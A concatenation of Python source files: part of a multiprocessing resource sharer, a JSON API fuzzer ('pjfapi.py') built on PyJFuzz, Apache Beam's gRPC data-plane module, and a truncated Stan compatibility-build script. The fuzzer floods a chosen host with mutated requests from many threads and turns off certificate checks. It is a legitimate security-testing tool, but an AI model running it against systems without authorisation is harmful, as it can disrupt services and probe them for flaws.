self._lock = threading.Lock()
self._listener = None
self._address = None
self._thread = None
util.register_after_fork(self, _ResourceSharer._afterfork)
def register(self, send, close):
'''Register resource, returning an identifier.'''
with self._lock:
if self._address is None:
self._start()
self._key += 1
self._cache[self._key] = (send, close)
return (self._address, self._key)
@staticmethod
def get_connection(ident):
'''Return connection from which to receive identified resource.'''
from .connection import Client
address, key = ident
c = Client(address, authkey=process.current_process().authkey)
c.send((key, os.getpid()))
return c
def stop(self, timeout=None):
'''Stop the background thread and clear registered resources.'''
from .connection import Client
with self._lock:
if self._address is not None:
c = Client(self._address,
authkey=process.current_process().authkey)
c.send(None)
c.close()
self._thread.join(timeout)
if self._thread.is_alive():
util.sub_warning('_ResourceSharer thread did '
'not stop when asked')
self._listener.close()
self._thread = None
self._address = None
self._listener = None
for key, (send, close) in self._cache.items():
close()
self._cache.clear()
def _afterfork(self):
for key, (send, close) in self._cache.items():
close()
self._cache.clear()
# If self._lock was locked at the time of the fork, it may be broken
# -- see issue 6721. Replace it without letting it be gc'ed.
self._old_locks.append(self._lock)
self._lock = threading.Lock()
if self._listener is not None:
self._listener.close()
self._listener = None
self._address = None
self._thread = None
def _start(self):
from .connection import Listener
assert self._listener is None, "Already have Listener"
util.debug('starting listener and thread for sending handles')
self._listener = Listener(authkey=process.current_process().authkey)
self._address = self._listener.address
t = threading.Thread(target=self._serve)
t.daemon = True
t.start()
self._thread = t
def _serve(self):
if hasattr(signal, 'pthread_sigmask'):
signal.pthread_sigmask(signal.SIG_BLOCK, range(1, signal.NSIG))
while 1:
try:
with self._listener.accept() as conn:
msg = conn.recv()
if msg is None:
break
key, destination_pid = msg
send, close = self._cache.pop(key)
try:
send(conn, destination_pid)
finally:
close()
except:
if not util.is_exiting():
sys.excepthook(*sys.exc_info())
_resource_sharer = _ResourceSharer()
stop = _resource_sharer.stop
|
pjfapi.py | """
PyJFAPI - CLI json API fuzzer
PyJFAPI perform automatic analysis of JSON API using PyJFuzz fuzzing
framework (https://www.github.com/mseclab/PyJFuzz), the automatic analysis will extract
just the useful request which may lead to security flaws. If you found this tool useful
please leave a comment on GitHub!
MIT License
Copyright (c) 2017 Daniele Linguaglossa
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from BaseHTTPServer import BaseHTTPRequestHandler
try:
from pyjfuzz.lib import PJFConfiguration
from pyjfuzz.lib import PJFFactory
except ImportError:
print "[!] Can't find PyJFuzz API library, please install with: 'git clone https://github.com/mseclab/PyJFuzz.git'"
print "[!] One done install with: 'sudo python setup.py install'"
exit(-1)
from argparse import Namespace
from StringIO import StringIO
from threading import Thread
from threading import Lock
import multiprocessing
import argparse
import httplib
import hashlib
import socket
import signal
import urllib
import Queue
import time
import json
import ssl
import sys
import os
import re
print_queue = Queue.Queue(0)
def printer_thread():
"""
Thread used to prevent race condition over console while printing, it uses a message Queue
"""
# infinite printer loop
while True:
try:
# if printer queue is not empty => we have something to print!
while not print_queue.empty():
# get the element to print
element = print_queue.get()
sys.stdout.write("[INFO] {0}\n".format(element))
# task done! get the next
print_queue.task_done()
# prevent high CPU usage
time.sleep(0.1)
except KeyboardInterrupt:
# handle ctrl+c to prevent infinite process loop
break
def init_printer():
"""
Init the printer thread see above
"""
pthread = Thread(target=printer_thread, args=())
# set daemon so process end when printer thread is killed
pthread.setDaemon(True)
pthread.start()
class HTTPRequestParser(BaseHTTPRequestHandler):
def __init__(self, request_text):
"""
Parse the request headers plus body
"""
# rfile contains the full http message
self.rfile = StringIO(request_text)
self.raw_requestline = self.rfile.readline()
# get errors during parsing
self.error_code = self.error_message = None
# parse the message
self.parse_request()
tmp = {}
# restore original headers (CamelCase)
for header in self.headers.headers:
key, val = header[:-2].split(": ")
tmp.update({key: val})
self.headers = tmp
# Put connection to close in order to prevent socket bottleneck
if "Connection" in self.headers:
self.headers["Connection"] = "close"
else:
self.headers.update({"Connection": "close"})
# delete the content-length header since it will be updated by httplib during requests
if "Content-Length" in self.headers:
del self.headers["Content-Length"]
# wfile will contains just the message body (POST)
self.wfile = StringIO(request_text.split("\r\n\r\n", 1)[1])
self._body = self.wfile.read()
def send_error(self, code, message):
self.error_code = code
self.error_message = message
def setbody(self, data):
# set a custom body (POST)
self.wfile = StringIO(data)
def getbody(self):
# if body is not defined let's read from wfile
if not self._body:
self._body = self.wfile.read()
return self._body
def tostring(self):
# convert the object to plain http message
buf = self.raw_requestline
# print each header
for header in self.headers:
buf += "{0}: {1}\r\n".format(header, self.headers[header])
buf += "\r\n"
# print the message body , empty if GET
buf += self.getbody()
return buf
def make_request(ip, port, data, secure=False, debug=False):
"""
Perform the actual request
"""
# should we go ssl?
try:
if secure:
# if we are over ssl but we don't have a standard port let's put it inside url
if port != 443:
url = "https://{0}:{1}{2}".format(data.headers["Host"], port, data.path)
else:
# otherwise use just https protocol
url = "https://{0}{1}".format(data.headers["Host"], data.path)
# connect to the host
# Disable certificate checking with ssl
connection = httplib.HTTPSConnection(ip, port, timeout=10, context=ssl._create_unverified_context())
else:
# if we are over http but we don't have a standard port let's put it inside url
if port != 80:
url = "http://{0}:{1}{2}".format(data.headers["Host"], port, data.path)
else:
# otherwise use http procolo
url = "http://{0}{1}".format(data.headers["Host"], data.path)
# connect to the host
connection = httplib.HTTPConnection(ip, port, timeout=10)
# init the timer in order to get execution time
start_time = time.time()
# get the full response
d = data.getbody()
if data.command == "GET":
connection.request(data.command, url, headers=data.headers)
else:
connection.request(data.command, url, d, data.headers)
# get the execution time aka response time
exec_time = time.time() - start_time
response = connection.getresponse()
# we got an ssl error maybe hello over http port? or port closed
except ssl.CertificateError:
raise Exception("SSL certificate error exiting :(")
# we got a socket error maybe due to timeout or connection reset by peer, we should slow down or quit
except socket.error:
return None, 0.1
# generic exception let's print the message
except Exception as e:
raise Exception("Generic error: {0}".format(e.message))
return response, exec_time
def basic_info(ip, port, data, secure=False):
"""
Gather basic information about a request
"""
response, exec_time = make_request(ip, port, data, secure)
if response is not None:
# get the HTTP code ie: 200 OK
http_code = response.status
# read the body
r = response.read()
# get the length
length = len(r)
# get the response hash
hash = hashlib.md5(r).hexdigest()
# return basic info (http code, response time, length, response hash)
return [http_code, exec_time, length, hash]
else:
return [None, 0.0, 0, None]
def calculate_average_statistics(ip, port, data, secure=False):
"""
Calculate average stats
"""
print_queue.put("Performing 5 requests to {0}".format(ip))
http_code = []
exec_time = []
length = []
hash = []
for _ in range(0, 5):
# for each request save http code, response time, body length, body hash
c,e,l,h = basic_info(ip, port, data, secure)
http_code.append(c)
exec_time.append(e)
length.append(l)
hash.append(h)
# sleep to prevent possible API rate limit
time.sleep(1.5)
# perform the average calculation
avghttpcode = ["{0}".format(x) for x in list(set(http_code))]
avgtime = round(sum(map(float, exec_time))/10, 4)
avglength = sum(map(int, length))/10
avghash = [x for x in list(set(hash))]
# print the results
print_queue.put("Average statistics:\n\n"
" HTTP Code: {0}\n"
" Time: {1}\n"
" Length: {2}\n"
" Hash: {3}\n".format(avghttpcode, avgtime, avglength, avghash))
# return the average stats
return [avghttpcode, avgtime, avglength, avghash]
def clean_template(data, payload):
template_regex = re.compile("(\*\*\*.*\*\*\*)")
# replace the injection point with original data from the template
cleaned = template_regex.sub(payload, data, 1)
# parse the response to update content-length
parsed = HTTPRequestParser(cleaned)
# set the body so content-length header will be updated
parsed.setbody(parsed.getbody())
# return the plain text request
return parsed.tostring()
def check_template(data):
# regex used to match the injection point
template_regex = re.compile("\*\*\*(.*)\*\*\*")
template_info = data
# check if we got an injection point via regex
if len(template_regex.findall(template_info)) > 0:
# if we have a match count reference
matches = template_regex.findall(template_info)
# if we got 1 match it's all OK!
if len(matches) == 1:
# try to check if payload is encoded
try:
j = json.loads(matches[0])
# check if it's a valid json
if type(j) not in [dict, list]:
raise Exception("Invalid injection point value (not JSON)!")
return matches[0], False
except:
# otherwise
j = json.loads(urllib.unquote(matches[0]))
if type(j) not in [dict, list]:
raise Exception("Invalid injection point value (not JSON)!")
return matches[0], True
# if we got multiple match notify user
elif len(matches) > 1:
raise Exception("Got multiple injection point on template, please fix")
# else we miss injection point
else:
raise Exception("Missing injection point on template, please fix")
def merge_stats(stats, global_stats):
"""
Merge both fuzzed and original stats to make it reliable next time
"""
# add the status code to the know-list
if str(stats[0]) not in global_stats[0]:
global_stats[0] = global_stats[0] + [str(stats[0])]
# calculate the avg between response time
global_stats[1] = (global_stats[1] + stats[1]) / 2
# calculate the avg between response length
global_stats[2] = (global_stats[2] + stats[2]) / 2
# add the hash to the know-list
if stats[3] not in global_stats[3]:
global_stats[3] = global_stats[3] + [stats[3]]
def is_interesting(stats, global_stats, payload, min_difference=2):
"""
Compare fuzzed input stats against original stats
"""
# init the difference counter, we should have at least 2 difference to make it interesting
difference_counter = 0
# get the fuzzed stats
http_code, exec_time, response_length, response_hash = tuple(stats)
# http code already exists in out original stats??
if str(http_code) not in global_stats[0]:
difference_counter += 1
if exec_time - global_stats[1] < 0:
diff_exec_time = (exec_time - global_stats[1]) * -1
else:
diff_exec_time = exec_time - global_stats[1]
# there is a difference of 5 or more secs between their response time?
if diff_exec_time <= 5:
difference_counter += 1
if response_length - global_stats[2] < 0:
difference_response_length = (response_length - global_stats[2]) * -1
else:
difference_response_length = (response_length - global_stats[2])
# there's something difference between their response content and length?
if difference_response_length >= len(payload):
if response_hash not in global_stats[3]:
difference_counter += 2
# we got more than 2 difference?
if difference_counter >= min_difference:
return True
else:
return False
def fuzzer_process(ip, port, data, secure=False, max_threads=10, process_queue=None, stats=None, s_fuzz=False):
"""
Represent a fuzzer process it starts some threads which do the actual job
"""
fuzzer_queue = Queue.Queue(0)
threads = []
global_thread_lock = Lock()
# check the template and get the original payload
org_payload, encoded = check_template(data)
def fuzzer_thread(ip, port, data, secure, stats):
"""
Represent a nested thread routine
"""
while True:
# if we got something to process from our parent process let's process it
while not fuzzer_queue.empty():
# get the element to fuzz
fuzzed = fuzzer_queue.get()
result = [None, 0, 0, None]
# perform the request until we got a result
while result[1] == 0:
# make the actual request and return the stats for the fuzzed request
result = basic_info(ip, port, HTTPRequestParser(clean_template(data, fuzzed)), secure)
# we really got a result? :D
if result[1] > 0:
break
else:
# maybe we are going to fast?
time.sleep(2)
#process_queue.put(result)
# lock the global stats
global_thread_lock.acquire()
# check against stats
if is_interesting(result, stats, fuzzed):
# we got something interesting update global stats
merge_stats(result, stats)
# we got something interesting let's notify parent process
process_queue.put("Got something interesting!\n\n"
" Payload: {0}\n"
" HTTP Code: {1}\n"
" Execution time: {2}\n"
" Response Length: {3}\n"
" Response Hash: {4}\n".format(fuzzed, result[0],
result[1], result[2], result[3]))
# unlock the global stats
global_thread_lock.release()
# skip to the next element
fuzzer_queue.task_done()
# sleep to prevent high CPU usage
time.sleep(1)
for _ in range(0, max_threads):
# start <max_threads> thread which perform the fuzzing job
threads.append(Thread(target=fuzzer_thread, args=(ip, port, data, secure, stats)))
threads[-1].start()
# init PyJFuzz configuration (see documentation)
config = PJFConfiguration(Namespace(
json=json.loads(urllib.unquote(org_payload)) if encoded else json.loads(org_payload),
level=6,
strong_fuzz=s_fuzz,
nologo=True,
debug=False,
url_encode=encoded,
recheck_ports=False
))
# init the object factory used to fuzz (see documentation)
factory = PJFFactory(config)
while True:
try:
# send the fuzzed input to the global thread queue
fuzzer_queue.put(factory.fuzzed)
# sleep to prevent high cpu usage
time.sleep(0.1)
except:
# if something wrong happen just exit the process
break
exit(0)
def start_processes(ip, port, data, secure, process_queue, stats, process_num=5, threads_per_process=10, strong_fuzz=False):
# declare a process pool
process_pool = []
# init a process manager used to share stats between process in order to avoid same results multiple times
manager_stats = multiprocessing.Manager().list()
for item in stats:
manager_stats.append(item)
# create <process_num> processes
for _ in range(1, process_num+1):
process_pool.append(multiprocessing.Process(target=fuzzer_process,
args=(ip,
port,
data,
secure,
threads_per_process,
process_queue,
manager_stats,
strong_fuzz)))
# start the created process
process_pool[-1].start()
print_queue.put("Process {0} started!".format(_))
# return the process pool
return process_pool
def bye():
# give enough time to print last messages
time.sleep(1)
#def main(ip, port, data, secure=False, process_num=10, threads_per_process=10, strong_fuzz=False):
def main(config):
"""
Main routine do the hard job
"""
# init the printer thread
init_printer()
print_queue.put("Starting PyJFAPI...")
# test the injection template for errors
try:
check_template(config.data)
except Exception as e:
print_queue.put("Template error: {0}".format(e))
return bye()
# notify the user about injection point
print_queue.put("Injection point found: {0}".format(check_template(config.data)[0]))
# calculate initial request statistics
try:
# parse the request without injection marker
parsed = HTTPRequestParser(clean_template(config.data, check_template(config.data)[0]))
# perform 10 requests and calculate average statistics
statistics = calculate_average_statistics(config.host, config.port, parsed, config.secure)
# if we don't have stats, quit (check hashes)!
if None in statistics[3]:
print_queue.put("Unable to retrieve stats :(")
return bye()
# ooops something wrong happened let's notify the user
except Exception as e:
print_queue.put(e)
return bye()
# we got ctrl+c so let's quit :( you should really use this script
except KeyboardInterrupt:
return
# create a Queue used to communicate results between created processes and main process
process_queue = multiprocessing.Queue(0)
# let's notify the user that we are starting the real fuzzing now!
print_queue.put("Start fuzzing in a few seconds...")
# start processes and return a process pool
process_pool = start_processes(config.host, config.port, config.data, config.secure, process_queue, statistics,
config.process_num, config.thread_num, config.strong_fuzz)
while True:
try:
while not process_queue.empty():
# if queue is not empty we have some results from a process let's print it by adding it to print_queue
print_queue.put(process_queue.get())
# sleep to prevent high CPU usage
time.sleep(0.1)
except KeyboardInterrupt:
# we got ctrl+c so let's kill al processes
print_queue.put("Killing all processes, please wait...")
for process in process_pool:
# Send sigkill to each process
os.kill(process.pid, signal.SIGKILL)
# exit the loop
break
return bye()
def fix_request(req):
"""
When copied from developer console or BurpSuite \r\n is replaced by \n so let's fix this
"""
# whenever we don't have \r\n inside our request
if "\r\n" not in req:
# let's replace \n with \r\n should fix the issue anyway it's not really strong
req = req.replace("\n", "\r\n")
return req
def check_template_path(path):
"""
Argument checker, check if template exists and get the content
"""
try:
with open(path) as template:
tmp = template.read()
return tmp
except:
raise argparse.ArgumentTypeError("Invalid template path!")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-H', type=str, metavar="HOST", help="The hostname", required=True, dest="host")
parser.add_argument('-P', type=int, metavar="PORT", help="Connection port", required=True, dest="port")
parser.add_argument('-T', type=check_template_path, metavar="REQUEST TEMPLATE",
help="Request template used for fuzzing", required=True, dest="template")
parser.add_argument('--s', default=False, help="Use strong fuzzing", action="store_true", dest="strong_fuzz")
parser.add_argument('--p', type=int, default=1, metavar="PROCESS NUMBER", help="Number of process to start",
dest="process_num")
parser.add_argument('--t', type=int, default=10, metavar="THREAD NUMBER", help="Number of thread for each process",
dest="thread_num")
parser.add_argument('--ssl', default=False, help="Use ssl handshake just for https requests", action="store_true",
dest="secure")
args = parser.parse_args()
setattr(args, "data", fix_request(args.template))
main(args)
|
data_plane.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Implementation of DataChannels for communicating across the data plane."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import logging
import queue
import sys
import threading
from builtins import object
from builtins import range
import grpc
from future.utils import raise_
from future.utils import with_metaclass
from apache_beam.coders import coder_impl
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.runners.worker.channel_factory import GRPCChannelFactory
from apache_beam.runners.worker.worker_id_interceptor import WorkerIdInterceptor
# This module is experimental. No backwards-compatibility guarantees.
_DEFAULT_FLUSH_THRESHOLD = 10 << 20 # 10MB
class ClosableOutputStream(type(coder_impl.create_OutputStream())):
"""A Outputstream for use with CoderImpls that has a close() method."""
def __init__(self,
close_callback=None,
flush_callback=None,
flush_threshold=_DEFAULT_FLUSH_THRESHOLD):
super(ClosableOutputStream, self).__init__()
self._close_callback = close_callback
self._flush_callback = flush_callback
self._flush_threshold = flush_threshold
# This must be called explicitly to avoid flushing partial elements.
def maybe_flush(self):
if self._flush_callback and self.size() > self._flush_threshold:
self._flush_callback(self.get())
self._clear()
def close(self):
if self._close_callback:
self._close_callback(self.get())
class DataChannel(with_metaclass(abc.ABCMeta, object)):
"""Represents a channel for reading and writing data over the data plane.
Read from this channel with the input_elements method::
for elements_data in data_channel.input_elements(instruction_id, targets):
[process elements_data]
Write to this channel using the output_stream method::
out1 = data_channel.output_stream(instruction_id, target1)
out1.write(...)
out1.close()
When all data for all instructions is written, close the channel::
data_channel.close()
"""
@abc.abstractmethod
def input_elements(
self, instruction_id, expected_targets, abort_callback=None):
"""Returns an iterable of all Element.Data bundles for instruction_id.
This iterable terminates only once the full set of data has been recieved
for each of the expected targets. It may block waiting for more data.
Args:
instruction_id: which instruction the results must belong to
expected_targets: which targets to wait on for completion
abort_callback: a callback to invoke if blocking returning whether
to abort before consuming all the data
"""
raise NotImplementedError(type(self))
@abc.abstractmethod
def output_stream(self, instruction_id, target):
"""Returns an output stream writing elements to target.
Args:
instruction_id: which instruction this stream belongs to
target: the target of the returned stream
"""
raise NotImplementedError(type(self))
@abc.abstractmethod
def close(self):
"""Closes this channel, indicating that all data has been written.
Data can continue to be read.
If this channel is shared by many instructions, should only be called on
worker shutdown.
"""
raise NotImplementedError(type(self))
class InMemoryDataChannel(DataChannel):
"""An in-memory implementation of a DataChannel.
This channel is two-sided. What is written to one side is read by the other.
The inverse() method returns the other side of a instance.
"""
def __init__(self, inverse=None):
self._inputs = []
self._inverse = inverse or InMemoryDataChannel(self)
def inverse(self):
return self._inverse
def input_elements(self, instruction_id, unused_expected_targets=None,
abort_callback=None):
other_inputs = []
for data in self._inputs:
if data.instruction_reference == instruction_id:
if data.data:
yield data
else:
other_inputs.append(data)
self._inputs = other_inputs
def output_stream(self, instruction_id, target):
def add_to_inverse_output(data):
self._inverse._inputs.append( # pylint: disable=protected-access
beam_fn_api_pb2.Elements.Data(
instruction_reference=instruction_id,
target=target,
data=data))
return ClosableOutputStream(
add_to_inverse_output, flush_callback=add_to_inverse_output)
def close(self):
pass
class _GrpcDataChannel(DataChannel):
"""Base class for implementing a BeamFnData-based DataChannel."""
_WRITES_FINISHED = object()
def __init__(self):
self._to_send = queue.Queue()
self._received = collections.defaultdict(queue.Queue)
self._receive_lock = threading.Lock()
self._reads_finished = threading.Event()
self._closed = False
self._exc_info = None
def close(self):
self._to_send.put(self._WRITES_FINISHED)
self._closed = True
def wait(self, timeout=None):
self._reads_finished.wait(timeout)
def _receiving_queue(self, instruction_id):
with self._receive_lock:
return self._received[instruction_id]
def _clean_receiving_queue(self, instruction_id):
with self._receive_lock:
self._received.pop(instruction_id)
def input_elements(self, instruction_id, expected_targets,
abort_callback=None):
"""
Generator to retrieve elements for an instruction_id
input_elements should be called only once for an instruction_id
Args:
instruction_id(str): instruction_id for which data is read
expected_targets(collection): expected targets
"""
received = self._receiving_queue(instruction_id)
done_targets = []
abort_callback = abort_callback or (lambda: False)
try:
while len(done_targets) < len(expected_targets):
try:
data = received.get(timeout=1)
except queue.Empty:
if self._closed:
raise RuntimeError('Channel closed prematurely.')
if abort_callback():
return
if self._exc_info:
t, v, tb = self._exc_info
raise_(t, v, tb)
else:
if not data.data and data.target in expected_targets:
done_targets.append(data.target)
else:
assert data.target not in done_targets
yield data
finally:
# Instruction_ids are not reusable so Clean queue once we are done with
# an instruction_id
self._clean_receiving_queue(instruction_id)
def output_stream(self, instruction_id, target):
def add_to_send_queue(data):
if data:
self._to_send.put(
beam_fn_api_pb2.Elements.Data(
instruction_reference=instruction_id,
target=target,
data=data))
def close_callback(data):
add_to_send_queue(data)
# End of stream marker.
self._to_send.put(
beam_fn_api_pb2.Elements.Data(
instruction_reference=instruction_id,
target=target,
data=b''))
return ClosableOutputStream(
close_callback, flush_callback=add_to_send_queue)
def _write_outputs(self):
done = False
while not done:
data = [self._to_send.get()]
try:
# Coalesce up to 100 other items.
for _ in range(100):
data.append(self._to_send.get_nowait())
except queue.Empty:
pass
if data[-1] is self._WRITES_FINISHED:
done = True
data.pop()
if data:
yield beam_fn_api_pb2.Elements(data=data)
def _read_inputs(self, elements_iterator):
# TODO(robertwb): Pushback/throttling to avoid unbounded buffering.
try:
for elements in elements_iterator:
for data in elements.data:
self._receiving_queue(data.instruction_reference).put(data)
except: # pylint: disable=bare-except
if not self._closed:
logging.exception('Failed to read inputs in the data plane')
self._exc_info = sys.exc_info()
raise
finally:
self._closed = True
self._reads_finished.set()
def _start_reader(self, elements_iterator):
reader = threading.Thread(
target=lambda: self._read_inputs(elements_iterator),
name='read_grpc_client_inputs')
reader.daemon = True
reader.start()
class GrpcClientDataChannel(_GrpcDataChannel):
"""A DataChannel wrapping the client side of a BeamFnData connection."""
def __init__(self, data_stub):
super(GrpcClientDataChannel, self).__init__()
self._start_reader(data_stub.Data(self._write_outputs()))
class GrpcServerDataChannel(
beam_fn_api_pb2_grpc.BeamFnDataServicer, _GrpcDataChannel):
"""A DataChannel wrapping the server side of a BeamFnData connection."""
def Data(self, elements_iterator, context):
self._start_reader(elements_iterator)
for elements in self._write_outputs():
yield elements
class DataChannelFactory(with_metaclass(abc.ABCMeta, object)):
"""An abstract factory for creating ``DataChannel``."""
@abc.abstractmethod
def create_data_channel(self, remote_grpc_port):
"""Returns a ``DataChannel`` from the given RemoteGrpcPort."""
raise NotImplementedError(type(self))
@abc.abstractmethod
def close(self):
"""Close all channels that this factory owns."""
raise NotImplementedError(type(self))
class GrpcClientDataChannelFactory(DataChannelFactory):
"""A factory for ``GrpcClientDataChannel``.
Caches the created channels by ``data descriptor url``.
"""
def __init__(self, credentials=None):
self._data_channel_cache = {}
self._lock = threading.Lock()
self._credentials = None
if credentials is not None:
logging.info('Using secure channel creds.')
self._credentials = credentials
def create_data_channel(self, remote_grpc_port):
url = remote_grpc_port.api_service_descriptor.url
if url not in self._data_channel_cache:
with self._lock:
if url not in self._data_channel_cache:
logging.info('Creating channel for %s', url)
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size
# is controlled in a layer above.
channel_options = [("grpc.max_receive_message_length", -1),
("grpc.max_send_message_length", -1)]
grpc_channel = None
if self._credentials is None:
grpc_channel = GRPCChannelFactory.insecure_channel(
url, options=channel_options)
else:
grpc_channel = GRPCChannelFactory.secure_channel(
url, self._credentials, options=channel_options)
# Add workerId to the grpc channel
grpc_channel = grpc.intercept_channel(grpc_channel,
WorkerIdInterceptor())
self._data_channel_cache[url] = GrpcClientDataChannel(
beam_fn_api_pb2_grpc.BeamFnDataStub(grpc_channel))
return self._data_channel_cache[url]
def close(self):
logging.info('Closing all cached grpc data channels.')
for _, channel in self._data_channel_cache.items():
channel.close()
self._data_channel_cache.clear()
class InMemoryDataChannelFactory(DataChannelFactory):
"""A singleton factory for ``InMemoryDataChannel``."""
def __init__(self, in_memory_data_channel):
self._in_memory_data_channel = in_memory_data_channel
def create_data_channel(self, unused_remote_grpc_port):
return self._in_memory_data_channel
def close(self):
pass
|
varmat_compatibility.py | #!/usr/bin/python
import itertools
import json
from argparse import ArgumentDefaultsHelpFormatter, ArgumentParser
import os
import Queue
import subprocess
import re
import sys
import tempfile
import threading
from sig_utils import make, handle_function_list, get_signatures
from signature_parser import SignatureParser
from code_generator import CodeGenerator
HERE = os.path.dirname(os.path.realpath(__file__))
TEST_FOLDER = os.path.abspath(os.path.join(HERE, "..", "test"))
sys.path.append(TEST_FOLDER)
WORKING_FOLDER = "test/varmat-compatibility"
TEST_TEMPLATE = """
static void {test_name}() {{
{code}
}}
"""
def run_command(command):
"""
Runs given command and waits until it finishes executing.
:param command: command to execute
"""
proc = subprocess.Popen(command, stdout = subprocess.PIPE, stderr = subprocess.PIPE)
stdout, stderr = proc.communicate()
if proc.poll() == 0:
return (True, stdout, stderr)
else:
return (False, stdout, stderr)
def build_signature(prefix, cpp_code, debug):
"""
Try to build the given cpp code
Return true if the code was successfully built
:param prefix: Prefix to give file names so easier to debug
:param cpp_code: Code to build
:param debug: If true, don't delete temporary files
"""
f = tempfile.NamedTemporaryFile("w", dir = WORKING_FOLDER, prefix = prefix + "_", suffix = "_test.cpp", delete = False)
f.write("#include <test/expressions/expression_test_helpers.hpp>\n\n")
f.write(cpp_code)
f.close()
cpp_path = os.path.join(WORKING_FOLDER, os.path.basename(f.name))
object_path = cpp_path.replace(".cpp", ".o")
dependency_path = cpp_path.replace(".cpp", ".d")
stdout_path = cpp_path.replace(".cpp", ".stdout")
stderr_path = cpp_path.replace(".cpp", ".stderr")
successful, stdout, stderr = run_command([make, object_path])
if successful or not debug:
try:
os.remove(cpp_path)
except OSError:
pass
try:
os.remove(dependency_path)
except OSError:
pass
try:
os.remove(object_path)
except OSError:
pass
else:
if debug:
with open(stdout_path, "w") as stdout_f:
stdout_f.write(stdout.decode("utf-8"))
with open(stderr_path, "w") as stderr_f:
stderr_f.write(stderr.decode("utf-8"))
return successful
def main(functions_or_sigs, results_file, cores, debug):
"""
Attempt to build all the signatures in functions_or_sigs, or all the signatures
associated with all the functions in functions_or_sigs, or if functions_or_sigs
is empty every signature the stanc3 compiler exposes.
Results are written to a results json file. Individual signatures are classified
as either compatible, incompatible, or irrelevant.
Compatible signatures can be compiled with varmat types in every argument that
could possibly be a varmat (the matrix-like ones).
Incompatible signatures cannot all be built, and for irrelevant signatures it does
not make sense to try to build them (there are no matrix arguments, or the function
does not support reverse mode autodiff, etc).
Compilation is done in parallel using the number of specified cores.
:param functions_or_sigs: List of function names and/or signatures to benchmark
:param results_file: File to use as a results cache
:param cores: Number of cores to use for compiling
:param debug: If true, don't delete temporary files
"""
all_signatures = get_signatures()
functions, signatures = handle_function_list(functions_or_sigs)
requested_functions = set(functions)
compatible_signatures = set()
incompatible_signatures = set()
irrelevant_signatures = set()
# Read the arguments and figure out the exact list of signatures to test
signatures_to_check = set()
for signature in all_signatures:
sp = SignatureParser(signature)
if len(requested_functions) > 0 and sp.function_name not in requested_functions:
continue
signatures_to_check.add(signature)
work_queue = Queue.Queue()
# For each signature, generate cpp code to test
for signature in signatures_to_check:
sp = SignatureParser(signature)
if sp.is_high_order():
work_queue.put((n, signature, None))
continue
cpp_code = ""
any_overload_uses_varmat = False
for m, overloads in enumerate(itertools.product(("Prim", "Rev", "RevVarmat"), repeat = sp.number_arguments())):
cg = CodeGenerator()
arg_list_base = cg.build_arguments(sp, overloads, size = 1)
arg_list = []
for overload, arg in zip(overloads, arg_list_base):
if arg.is_reverse_mode() and arg.is_varmat_compatible() and overload.endswith("Varmat"):
any_overload_uses_varmat = True
arg = cg.to_var_value(arg)
arg_list.append(arg)
cg.function_call_assign("stan::math::" + sp.function_name, *arg_list)
cpp_code += TEST_TEMPLATE.format(
test_name = sp.function_name + repr(m),
code=cg.cpp(),
)
if any_overload_uses_varmat:
work_queue.put((work_queue.qsize(), signature, cpp_code))
else:
print("{0} ... Irrelevant".format(signature.strip()))
irrelevant_signatures.add(signature)
output_lock = threading.Lock()
if not os.path.exists(WORKING_FOLDER):
os.mkdir(WORKING_FOLDER)
work_queue_original_length = work_queue.qsize()
# Test if each cpp file builds and update the output file
# This part is done in parallel
def worker():
while True:
try:
n, signature, cpp_code = work_queue.get(False)
except Queue.Empty:
return # If queue is empty, worker quits
# Use signature as filename prefix to make it easier to find
prefix = re.sub('[^0-9a-zA-Z]+', '_', signature.strip())
# Test the signature
successful = build_signature(prefix, cpp_code, debug)
# Acquire a lock to do I/O
with output_lock:
if successful:
result_string = "Success"
compatible_signatures.add(signature)
else:
result_string = "Fail"
incompatible_signatures.add(signature)
print("Results of test {0} / {1}, {2} ... ".format(n, work_queue_original_length, signature.strip()) + result_string)
work_queue.task_done()
for i in range(cores):
threading.Thread(target = worker).start()
work_queue.join()
with open(results_file, "w") as f:
json.dump({ "compatible_signatures" : list(compatible_signatures),
"incompatible_signatures" : list(incompatible_signatures),
"irrelevant_signatures" : list(irrelevant_signatures)
}, f, indent = 4, sort_keys = True)
class FullErrorMsgParser(ArgumentParser):
"""
Modified ArgumentParser that prints full error message on any error.
"""
def error(self, message):
sys.stderr.write("error: %s\n" % message)
self.print_help()
sys.exit(2)
def processCLIArgs():
"""
Define and process the command line interface to the benchmark.py script.
"""
parser = FullErrorMsgParser(
description="Generate and run_command benchmarks.",
formatter_class=ArgumentDefaultsHelpFormatter,
)
parser.add_argument(
"--functions",
nargs="+",
type=str,
default=[],
help="Signatures and/or function names to benchmark.",
)
parser.add_argument(
"-j",
type=int,
default=1,
help="Number of parallel cores to use.",
)
